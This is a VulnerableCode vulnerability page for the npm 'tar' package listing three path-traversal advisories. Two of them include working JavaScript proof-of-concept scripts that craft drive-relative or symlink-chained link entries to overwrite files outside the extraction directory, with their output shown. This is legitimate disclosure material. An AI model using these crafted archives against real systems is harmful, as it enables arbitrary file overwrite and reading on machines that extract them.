VulnerableCode Package Details

Search for packages

Vulnerability	Summary	Fixed by
VCID-bj4b-gq5e-2kfy Aliases: CVE-2026-29786 GHSA-qffp-2rhf-9h96	tar has Hardlink Path Traversal via Drive-Relative Linkpath ### Summary `tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction. ### Details The extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments before stripping absolute roots. What happens with `linkpath: "C:../target.txt"`: 1. Split on `/` gives `['C:..', 'target.txt']`, so `parts.includes('..')` is false. 2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`. 3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up. 4. Writing through the extracted hardlink overwrites the outside file. This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives. ### PoC Tested on Arch Linux with `tar@7.5.9`. PoC script (`poc.cjs`): ```js const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(process.cwd(), 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) ``` Run: ```bash cd test-workspace node poc.cjs && ls -l ../target.txt ``` Observed output: ```text PWNED -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt ``` `PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked. ### Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files	7.5.10 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}
VCID-qunt-xms1-a3cc Aliases: CVE-2026-31802 GHSA-9ppj-qmqm-q256	node-tar Symlink Path Traversal via Drive-Relative Linkpath ### Summary `tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction. ### Details The extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value. What happens with `linkpath: "C:../../../target.txt"`: 1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`. 2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted. 3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`. 4. Writing through the extracted symlink overwrites the outside file (`../target.txt`). This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives. ### PoC Tested on Arch Linux with `tar@7.5.10`. PoC script (`poc.cjs`): ```js const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(cwd, 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'a/b/l', type: 'SymbolicLink', linkpath: 'C:../../../target.txt', }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) ``` Run: ```bash node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt ``` Observed output: ```text PWNED ../../../target.txt lrwxrwxrwx - joshuavr 7 Mar 18:37 󰡯 a/b/l -> ../../../target.txt .rw-r--r-- 6 joshuavr 7 Mar 18:37  ../target.txt ``` `PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory. ### Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files	7.5.11 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-bj4b-gq5e-2kfy
Aliases:
CVE-2026-29786
GHSA-qffp-2rhf-9h96

tar has Hardlink Path Traversal via Drive-Relative Linkpath ### Summary `tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction. ### Details The extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots. What happens with `linkpath: "C:../target.txt"`: 1. Split on `/` gives `['C:..', 'target.txt']`, so `parts.includes('..')` is false. 2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`. 3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up. 4. Writing through the extracted hardlink overwrites the outside file. This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives. ### PoC Tested on Arch Linux with `tar@7.5.9`. PoC script (`poc.cjs`): ```js const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(process.cwd(), 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) ``` Run: ```bash cd test-workspace node poc.cjs && ls -l ../target.txt ``` Observed output: ```text PWNED -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt ``` `PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked. ### Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files

7.5.10
Affected by 1 other vulnerability.

VCID-qunt-xms1-a3cc
Aliases:
CVE-2026-31802
GHSA-9ppj-qmqm-q256

node-tar Symlink Path Traversal via Drive-Relative Linkpath ### Summary `tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction. ### Details The extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value. What happens with `linkpath: "C:../../../target.txt"`: 1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`. 2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted. 3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`. 4. Writing through the extracted symlink overwrites the outside file (`../target.txt`). This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives. ### PoC Tested on Arch Linux with `tar@7.5.10`. PoC script (`poc.cjs`): ```js const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(cwd, 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'a/b/l', type: 'SymbolicLink', linkpath: 'C:../../../target.txt', }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) ``` Run: ```bash node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt ``` Observed output: ```text PWNED ../../../target.txt lrwxrwxrwx - joshuavr 7 Mar 18:37 󰡯 a/b/l -> ../../../target.txt .rw-r--r-- 6 joshuavr 7 Mar 18:37  ../target.txt ``` `PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory. ### Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files

7.5.11
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
VCID-jj22-rfbv-bkg3	Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction ### Summary `tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options. This enables arbitrary file read and write as the extracting user (no root, no chmod, no `preservePaths`). Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. ### Details The bypass chain uses two symlinks plus one hardlink: 1. `a/b/c/up -> ../..` 2. `a/b/escape -> c/up/../..` 3. `exfil` (hardlink) -> `a/b/escape/<target-relative-to-parent-of-extract>` Why this works: - Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety. - See `STRIPABSOLUTEPATH` logic in: - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281` - Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`. - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703` - Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path. - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101` As a result, `exfil` is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`. ### PoC [hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js) Environment used for validation: - Node: `v25.4.0` - tar: `7.5.7` - OS: macOS Darwin 25.2.0 - Extract options: defaults (`tar.extract({ file, cwd })`) Steps: 1. Prepare/locate a `tar` module. If `require('tar')` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory. 2. Run: ```bash TAR_MODULE="$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)" node hardlink.js ``` 3. Expected vulnerable output (key lines): ```text same_inode=true read_ok=true write_ok=true result=VULNERABLE ``` Interpretation: - `same_inode=true`: extracted `exfil` and external secret are the same file object. - `read_ok=true`: reading `exfil` leaks external content. - `write_ok=true`: writing `exfil` modifies external file. ### Impact Vulnerability type: - Arbitrary file read/write via archive extraction path confusion and link resolution. Who is impacted: - Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults. - Impact scope is the privileges of the extracting process user. Potential outcomes: - Read sensitive files reachable by the process user. - Overwrite writable files outside extraction root. - Escalate impact depending on deployment context (keys, configs, scripts, app data).	CVE-2026-26960 GHSA-83g3-92jg-28cx

Vulnerability

Summary

Aliases

VCID-jj22-rfbv-bkg3

Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction ### Summary `tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options. This enables **arbitrary file read and write** as the extracting user (no root, no chmod, no `preservePaths`). Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. ### Details The bypass chain uses two symlinks plus one hardlink: 1. `a/b/c/up -> ../..` 2. `a/b/escape -> c/up/../..` 3. `exfil` (hardlink) -> `a/b/escape/<target-relative-to-parent-of-extract>` Why this works: - Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety. - See `STRIPABSOLUTEPATH` logic in: - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281` - Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`. - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703` - Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path. - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27` - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101` As a result, `exfil` is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`. ### PoC [hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js) Environment used for validation: - Node: `v25.4.0` - tar: `7.5.7` - OS: macOS Darwin 25.2.0 - Extract options: defaults (`tar.extract({ file, cwd })`) Steps: 1. Prepare/locate a `tar` module. If `require('tar')` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory. 2. Run: ```bash TAR_MODULE="$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)" node hardlink.js ``` 3. Expected vulnerable output (key lines): ```text same_inode=true read_ok=true write_ok=true result=VULNERABLE ``` Interpretation: - `same_inode=true`: extracted `exfil` and external secret are the same file object. - `read_ok=true`: reading `exfil` leaks external content. - `write_ok=true`: writing `exfil` modifies external file. ### Impact Vulnerability type: - Arbitrary file read/write via archive extraction path confusion and link resolution. Who is impacted: - Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults. - Impact scope is the privileges of the extracting process user. Potential outcomes: - Read sensitive files reachable by the process user. - Overwrite writable files outside extraction root. - Escalate impact depending on deployment context (keys, configs, scripts, app data).

CVE-2026-26960
GHSA-83g3-92jg-28cx

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-04-29T23:17:56.506716+00:00	GitLab Importer	Affected by	VCID-qunt-xms1-a3cc	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml	38.5.0
2026-04-29T23:15:07.788142+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml	38.5.0
2026-04-29T23:14:43.544554+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml	38.5.0
2026-04-29T23:01:09.418497+00:00	GitLab Importer	Fixing	VCID-jj22-rfbv-bkg3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml	38.5.0
2026-04-17T00:34:08.906329+00:00	GitLab Importer	Affected by	VCID-qunt-xms1-a3cc	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml	38.4.0
2026-04-17T00:31:26.144980+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml	38.4.0
2026-04-17T00:31:00.949826+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml	38.4.0
2026-04-17T00:18:15.460595+00:00	GitLab Importer	Fixing	VCID-jj22-rfbv-bkg3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml	38.4.0
2026-04-12T01:59:09.531854+00:00	GitLab Importer	Affected by	VCID-qunt-xms1-a3cc	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml	38.3.0
2026-04-12T01:56:06.566762+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml	38.3.0
2026-04-12T01:55:45.302321+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml	38.3.0
2026-04-12T01:42:32.394767+00:00	GitLab Importer	Fixing	VCID-jj22-rfbv-bkg3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml	38.3.0
2026-04-08T03:25:26.618030+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml	38.1.0
2026-04-08T03:24:51.302458+00:00	GitLab Importer	Affected by	VCID-bj4b-gq5e-2kfy	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml	38.1.0
2026-04-03T01:51:24.210666+00:00	GitLab Importer	Fixing	VCID-jj22-rfbv-bkg3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml	38.1.0
2026-04-01T16:08:01.098841+00:00	GHSA Importer	Fixing	VCID-jj22-rfbv-bkg3	https://github.com/advisories/GHSA-83g3-92jg-28cx	38.0.0
2026-04-01T12:53:53.401329+00:00	GitLab Importer	Fixing	VCID-jj22-rfbv-bkg3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml	38.0.0
2026-04-01T12:52:37.429907+00:00	GithubOSV Importer	Fixing	VCID-jj22-rfbv-bkg3	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json	38.0.0